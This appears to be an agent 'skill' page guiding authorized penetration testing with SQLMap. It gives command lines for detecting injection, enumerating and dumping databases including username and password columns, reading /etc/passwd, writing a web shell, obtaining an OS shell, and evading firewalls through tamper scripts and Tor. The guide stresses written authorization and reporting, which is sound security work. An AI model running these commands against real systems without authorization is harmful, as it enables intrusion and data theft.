SQLMap - Automated SQL Injection Tool

Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.

IMPORTANT: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.

Quick Start

Basic SQL injection detection:

# Test single parameter
sqlmap -u "http://example.com/page?id=1"

# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"

# Test from saved request file
sqlmap -r request.txt

# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs

Core Workflow

SQL Injection Testing Workflow

Progress: [ ] 1. Verify authorization for web application testing [ ] 2. Identify potential injection points [ ] 3. Detect SQL injection vulnerabilities [ ] 4. Determine DBMS type and version [ ] 5. Enumerate databases and tables [ ] 6. Extract sensitive data (if authorized) [ ] 7. Document findings with remediation guidance [ ] 8. Clean up any test artifacts

Work through each step systematically. Check off completed items.

1. Authorization Verification

CRITICAL: Before any SQL injection testing:

Confirm written authorization from application owner
Verify scope includes web application security testing
Understand data protection and handling requirements
Document allowed testing windows
Confirm backup and rollback procedures

2. Target Identification

Identify potential SQL injection points:

GET Parameters:

# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"

# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"

# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3

POST Requests:

# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"

# From Burp Suite request file
sqlmap -r login_request.txt

# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"

Cookies and Headers:

# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"

# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"

# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"

3. Detection and Fingerprinting

Detect SQL injection vulnerabilities:

# Basic detection
sqlmap -u "http://example.com/page?id=1"

# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3

# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ

# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint

# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql

Injection Techniques:

B: Boolean-based blind
E: Error-based
U: UNION query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

4. Database Enumeration

Enumerate database structure:

# List databases
sqlmap -u "http://example.com/page?id=1" --dbs

# Current database
sqlmap -u "http://example.com/page?id=1" --current-db

# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables

# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns

# Database users
sqlmap -u "http://example.com/page?id=1" --users

# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges

5. Data Extraction

Extract data from database (authorized only):

# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump

# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump

# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all

# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs

# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password

6. Advanced Exploitation

Advanced SQL injection techniques:

File System Access:

# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"

# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

OS Command Execution (requires stacked queries or out-of-band):

# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"

# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell

# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell

Authentication Bypass:

# Attempt to bypass login
sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic

# Test with authentication
sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password"

7. WAF Bypass and Evasion

Evade web application firewalls:

# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between

# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent

# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."

# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2

# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"

# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor

Common Tamper Scripts:

space2comment: Replace space with comments
between: Replace equals with BETWEEN
charencode: URL encode characters
randomcase: Random case for keywords
apostrophemask: Replace apostrophe with UTF-8
equaltolike: Replace equals with LIKE

Security Considerations

Authorization & Legal Compliance

Written Permission: Obtain explicit authorization for SQL injection testing
Data Protection: Handle extracted data per engagement rules
Scope Boundaries: Only test explicitly authorized applications
Backup Verification: Ensure backups exist before invasive testing
Production Systems: Extra caution on production databases

Operational Security

Rate Limiting: Use --delay to avoid overwhelming applications
Session Management: Save and resume sessions with --flush-session
Logging: All SQLMap activity is logged to ~/.sqlmap/output/
Data Sanitization: Redact sensitive data from reports
False Positives: Verify findings manually

Audit Logging

Document all SQL injection testing:

Target URLs and parameters tested
Injection techniques successful
Databases and tables accessed
Data extracted (summary only, not full data)
Commands executed
Tamper scripts and evasion used

Compliance

OWASP Top 10: A03:2021 - Injection
CWE-89: SQL Injection
MITRE ATT&CK: T1190 (Exploit Public-Facing Application)
PCI-DSS: 6.5.1 - Injection flaws
ISO 27001: A.14.2 Security in development

Common Patterns

Pattern 1: Basic Vulnerability Assessment

# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch

# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch

# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch

webapp-sqlmap

How to add

Drop this on your repo README

Related skills

xlsx

mem-search

weekly-digests

how-it-works

Get new Dados e Análise skills every Monday